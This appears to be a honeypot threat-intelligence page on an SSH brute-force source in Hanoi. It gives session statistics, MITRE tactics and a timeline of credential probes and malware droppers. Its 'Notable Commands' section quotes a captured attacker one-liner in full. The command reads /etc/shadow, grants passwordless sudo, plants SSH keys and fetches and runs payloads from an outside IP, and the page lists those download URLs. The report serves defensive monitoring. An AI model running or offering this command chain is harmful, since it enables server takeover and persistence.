1.53.4.0

TAGGED SUSPICIOUS
Threat Confidence
55%
Location
🇻🇳 VN / Hanoi
ASN
AS18403 · FPT Telecom Company
Cloud Provider
Total Events
705
Top 5% by volume
Agent Count
1
First / Last Seen
2026-05-15 05:15 — 2026-05-15 05:57
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Credential Access
Discovery
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
scanner ×2 malware_dropper ×23 credential_probe ×86
Sessions
111 (23 with login)
Avg Depth Score
0.38
Commands Executed
67
Files Downloaded
63
Notable Commands
  • uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto
  • chsh -s /bin/sh daemon
  • /tmp/x
  • /tmp/o
  • /tmp/oto
Download URLs
  • http://103.56.149.224/cacti/ns1.jpg
  • http://103.56.149.224/cacti/ns3.jpg
  • http://103.56.149.224/cacti/oto
Fingerprints
SSH-2.0-libssh2_1.4.3
Evidence Timeline
Credential Probe 4aff0d532655 w4m_singapore_01 · 2026-05-15 05:57
1 20%
Credential Probe dab105085fbc w4m_singapore_01 · 2026-05-15 05:56
1 20%
Credential Probe 4adbb3a5f43d w4m_singapore_01 · 2026-05-15 05:56
1 20%
Credential Probe 82e12ff57066 w4m_singapore_01 · 2026-05-15 05:55
1 20%
Credential Probe 3716b56aa4df w4m_singapore_01 · 2026-05-15 05:55
1 20%
Credential Probe eb59ea55fd51 w4m_singapore_01 · 2026-05-15 05:55
1 20%
Credential Probe c76c510b8608 w4m_singapore_01 · 2026-05-15 05:54
1 20%
Credential Probe 66b2d7e5fadf w4m_singapore_01 · 2026-05-15 05:54
1 20%
Malware Dropper 8c0cadd295bd w4m_singapore_01 · 2026-05-15 05:53
2 3 1 100%
Malware Dropper 98570db8735a w4m_singapore_01 · 2026-05-15 05:53
2 4 1 100%
Malware Dropper 940760553097 w4m_singapore_01 · 2026-05-15 05:53
5 1 1 100%
Malware Dropper 86f152a913ab w4m_singapore_01 · 2026-05-15 05:52
2 3 1 100%
Malware Dropper c7906cf6c13e w4m_singapore_01 · 2026-05-15 05:52
2 4 1 100%
Malware Dropper 8710ca3c20e4 w4m_singapore_01 · 2026-05-15 05:52
5 1 1 100%
Malware Dropper f8dc68658e50 w4m_singapore_01 · 2026-05-15 05:51
2 3 1 100%
Malware Dropper 9bab14c56ff8 w4m_singapore_01 · 2026-05-15 05:51
2 4 1 100%
Malware Dropper fba9d88585ea w4m_singapore_01 · 2026-05-15 05:51
5 1 1 100%
Malware Dropper 0ebf4f4cd821 w4m_singapore_01 · 2026-05-15 05:50
2 3 1 100%
Malware Dropper a7d7d68f69d2 w4m_singapore_01 · 2026-05-15 05:50
2 4 1 100%
Malware Dropper 9c7850a413f5 w4m_singapore_01 · 2026-05-15 05:49
5 1 1 100%
Malware Dropper c9c7ce633b28 w4m_singapore_01 · 2026-05-15 05:49
2 3 1 100%
Malware Dropper 7689e41b66f6 w4m_singapore_01 · 2026-05-15 05:49
2 4 1 100%
Malware Dropper 60f0758bc9b7 w4m_singapore_01 · 2026-05-15 05:48
5 1 1 100%
Malware Dropper aabc89843fbc w4m_singapore_01 · 2026-05-15 05:48
2 3 1 100%
Malware Dropper ba371afbf2f5 w4m_singapore_01 · 2026-05-15 05:48
2 4 1 100%
Malware Dropper ed716cdb2bb8 w4m_singapore_01 · 2026-05-15 05:47
5 1 1 100%
Malware Dropper 88459b4dd3a3 w4m_singapore_01 · 2026-05-15 05:47
2 3 1 100%
Malware Dropper e091dc154655 w4m_singapore_01 · 2026-05-15 05:47
2 4 1 100%
Malware Dropper 20dbdd6b965b w4m_singapore_01 · 2026-05-15 05:46
5 1 1 100%
Malware Dropper 37c245767934 w4m_singapore_01 · 2026-05-15 05:46
2 3 1 100%
Malware Dropper 4bbe3bec7533 w4m_singapore_01 · 2026-05-15 05:45
2 4 1 100%
Credential Probe dc67276b73c3 w4m_singapore_01 · 2026-05-15 05:45
1 20%
Credential Probe 353a8fdd0420 w4m_singapore_01 · 2026-05-15 05:45
1 20%
Credential Probe 4d18c3d3a114 w4m_singapore_01 · 2026-05-15 05:44
1 20%
Credential Probe 7946e9959b6a w4m_singapore_01 · 2026-05-15 05:44
1 20%
Credential Probe 6f21989da6a7 w4m_singapore_01 · 2026-05-15 05:44
1 20%
Credential Probe a5a5dfba4367 w4m_singapore_01 · 2026-05-15 05:43
1 20%
Credential Probe 06a57498c96e w4m_singapore_01 · 2026-05-15 05:43
1 20%
Credential Probe 718e63985a9b w4m_singapore_01 · 2026-05-15 05:43
1 20%
Credential Probe d0b4f46340e2 w4m_singapore_01 · 2026-05-15 05:42
1 20%
Credential Probe c7781f759c1f w4m_singapore_01 · 2026-05-15 05:42
1 20%
Credential Probe 2ff1a967c724 w4m_singapore_01 · 2026-05-15 05:42
1 20%
Credential Probe 945c5e74b193 w4m_singapore_01 · 2026-05-15 05:41
1 20%
Credential Probe d426505a9149 w4m_singapore_01 · 2026-05-15 05:41
1 20%
Credential Probe 07145c18c2ce w4m_singapore_01 · 2026-05-15 05:40
1 20%
Credential Probe 6b6b8ac29820 w4m_singapore_01 · 2026-05-15 05:40
1 20%
Credential Probe 56a0d3349d59 w4m_singapore_01 · 2026-05-15 05:40
1 20%
Credential Probe facf047c285c w4m_singapore_01 · 2026-05-15 05:39
1 20%
Credential Probe 038a257433b7 w4m_singapore_01 · 2026-05-15 05:39
1 20%
Credential Probe 2af2159ede9a w4m_singapore_01 · 2026-05-15 05:39
1 20%